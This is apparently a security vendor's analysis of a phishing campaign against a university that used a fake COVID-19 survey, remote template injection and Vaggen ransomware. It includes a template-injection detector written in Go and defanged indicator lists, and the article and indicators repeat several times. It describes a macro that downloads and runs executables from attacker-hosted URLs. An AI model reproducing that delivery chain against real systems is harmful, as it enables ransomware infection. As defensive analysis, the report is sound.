3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.

However, this attack and its motives differ from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims into paying to recover their encrypted files.

On discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, the attack was not successful, thanks to the rapid response of the UBC cybersecurity team.

Mandatory COVID-19 survey distributed to targeted recipients

The attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and Dropbox. Rather than sending the fake survey directly via email, the attacker uploaded the document to Box and Dropbox and used the share functionality of these platforms to distribute it.

This was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much harder to detect spam sent through file sharing services without generating a number of false positives.

The attacker claimed to be a manager and added the following comment to the file sharing invitation (shared with us by UBC):

Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more.
Please fill it out ASAP!

You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!

In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!

According to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file, since it was shared privately rather than publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.

Phishing document analysis

The phishing document uses template injection: the .docx file (which, as a .docx, cannot itself carry a macro) references a remote template (template.dotm) that Word fetches when the document is opened, and that template is weaponized with a malicious macro.
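Before looking at what the macro does, here is an added example (not code from this write-up, and not the attacker's template) showing where template injection lives inside a .docx and how to detect it offline: Word records an attached template as an attachedTemplate relationship in word/_rels/settings.xml.rels, and a remote template is simply one whose target is an http(s) URL rather than a local file path. The sample documents, the placeholder host example.invalid and the function names are constructed for this example.

```go
package main

import (
	"archive/zip"
	"bytes"
	"encoding/xml"
	"fmt"
	"io"
	"net/url"
	"strings"
)

// relationships mirrors an OPC .rels part: a flat list of <Relationship> elements.
type relationships struct {
	Rels []struct {
		ID         string `xml:"Id,attr"`
		Type       string `xml:"Type,attr"`
		Target     string `xml:"Target,attr"`
		TargetMode string `xml:"TargetMode,attr"`
	} `xml:"Relationship"`
}

// findRemoteTemplates opens a .docx (a zip) and returns the target of every
// attachedTemplate relationship that points to an http(s) URL. Attached templates
// are always TargetMode="External"; a legitimate local template shows up as a
// file:/// target, so the URL scheme is what separates injection from normal Word behaviour.
func findRemoteTemplates(docx []byte) ([]string, error) {
	zr, err := zip.NewReader(bytes.NewReader(docx), int64(len(docx)))
	if err != nil {
		return nil, err
	}
	var hits []string
	for _, f := range zr.File {
		// Word keeps the link in word/_rels/settings.xml.rels; scanning every
		// word/_rels/*.rels part also covers oddly packed documents.
		if !strings.HasPrefix(f.Name, "word/_rels/") || !strings.HasSuffix(f.Name, ".rels") {
			continue
		}
		rc, err := f.Open()
		if err != nil {
			return nil, err
		}
		data, err := io.ReadAll(rc)
		rc.Close()
		if err != nil {
			return nil, err
		}
		var rels relationships
		if err := xml.Unmarshal(data, &rels); err != nil {
			return nil, fmt.Errorf("%s: %w", f.Name, err)
		}
		for _, r := range rels.Rels {
			if !strings.HasSuffix(r.Type, "/attachedTemplate") || r.TargetMode != "External" {
				continue
			}
			u, err := url.Parse(r.Target)
			if err != nil || u.Scheme == "http" || u.Scheme == "https" {
				hits = append(hits, r.Target) // remote, or unparsable and worth a look
			}
		}
	}
	return hits, nil
}

const (
	relsNS   = "http://schemas.openxmlformats.org/package/2006/relationships"
	tmplType = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
)

// buildDocx packs parts into an in-memory zip; it only exists to construct sample inputs.
func buildDocx(parts map[string]string) []byte {
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	for name, body := range parts {
		w, err := zw.Create(name)
		if err != nil {
			panic(err)
		}
		io.WriteString(w, body)
	}
	if err := zw.Close(); err != nil {
		panic(err)
	}
	return buf.Bytes()
}

// settingsRels returns a constructed settings.xml.rels with one attachedTemplate link.
func settingsRels(target string) string {
	return `<?xml version="1.0" encoding="UTF-8" standalone="yes"?>` +
		`<Relationships xmlns="` + relsNS + `">` +
		`<Relationship Id="rId1" Type="` + tmplType + `" Target="` + target + `" TargetMode="External"/>` +
		`</Relationships>`
}

// Constructed samples: injectedDocx mimics the injection pattern (example.invalid is a
// placeholder, not an indicator from this report); benignDocx is a document attached
// to a local Normal.dotm, which must not be flagged.
func injectedDocx() []byte {
	return buildDocx(map[string]string{
		"word/document.xml":            `<w:document/>`,
		"word/_rels/settings.xml.rels": settingsRels("https://example.invalid/template.dotm"),
	})
}

func benignDocx() []byte {
	return buildDocx(map[string]string{
		"word/document.xml":            `<w:document/>`,
		"word/_rels/settings.xml.rels": settingsRels("file:///C:/Users/alice/AppData/Roaming/Microsoft/Templates/Normal.dotm"),
	})
}

func main() {
	for name, doc := range map[string][]byte{"injected": injectedDocx(), "benign": benignDocx()} {
		hits, err := findRemoteTemplates(doc)
		fmt.Printf("%s: remote templates=%v err=%v\n", name, hits, err)
	}
}
```

The check is static and needs no macro execution: the same zip-and-rels inspection can run in a mail gateway or on a file share, and because a .docx with an external attachedTemplate is rare in legitimate traffic, it is a low-noise indicator on its own.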
The remote template was uploaded to a free code hosting website (notabug.org).

When the macro is executed, it does the following:

Gets the %APPDATA% directory
Creates the Byxor directory in %APPDATA%
Downloads a file from the following URL and writes it as Polisen.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
Downloads a file from the following URL and writes it as Killar.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
Calls the Shell function to execute killar.exe
Checks the return value of the Shell function to determine whether the launch succeeded (on success, the return value is the task ID of the executed application)
If successful, it sends an HTTP GET request to:
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
If it isn’t successful, it sends an HTTP GET request to:
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted when a particular event occurs. This can be very useful as an early warning system that an intruder has gained access to a network.
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.

Vaggen ransomware

After being deployed, the ransomware starts encrypting the user’s files, adding the .VAGGEN extension to each of them. When the encryption process is finished, it drops a ransom note on the Desktop demanding a payment equivalent to 80 USD, to be paid in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go whose entry point is the function denoted as ‘main_main’.

Other functions belonging to the main application have obfuscated names, such as main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA and main_SPRINGA. Their roles map as follows:

main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware (i.e. the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64, then decrypted with the hardcoded XXTEA key (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.

Encrypting and renaming of the files is implemented as the callback of the standard Go function path/filepath.Walk.

Files are encrypted with AES-256 (32-byte key) in GCM mode. The encryption routine is similar to the one demonstrated here.
It uses a hardcoded key and a 12-byte nonce generated with CryptGenRandom, and the file content is encrypted with the gcm.Seal function.

The output file (with the .VAGGEN extension) consists of:

the 12-byte nonce
the encrypted content
the 16-byte GCM tag

The hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Because this key is fixed rather than generated per victim, and the nonce is stored in the clear at the start of each file, the key alone is enough to decrypt the content.

With all these elements, we can recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.

Unusually low ransom amount

Based on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low and, unlike professional ransomware, this attack can be recovered from fairly easily.

However, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point whether the University of British Columbia was the sole target or not.

Crawling additional repositories created by the threat actor, we found other Word template files that used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.

We are grateful for the information shared with us by the University of British Columbia.
This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.

IOCs

SHA-256 hashes are listed below each file name.

Variant 1:
summerofficetemplate.dotm
634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 2:
UBC-COVID19-Survey-Mandatory.docx
e869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3
template.dotm
334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
polisen.exe
03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf
killar.exe
43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f

Variant 3:
template1.dotm
225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4
notabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe
notabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe
canarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php
canarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp

Variant 4:
smoothtemplates.dotm
ada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
b4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 5:
template.dotm
7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe
canarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp
canarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php
mrmonster.exe
f42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23
mrclean.exe
71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a
When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1168 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1169 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. 
The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1170 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1171 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1172 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1173 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1174 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1175 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. 
A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1176 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1177 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. 
Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1178 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1179 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1180 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1181 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1182 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1183 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1184 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1185 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/a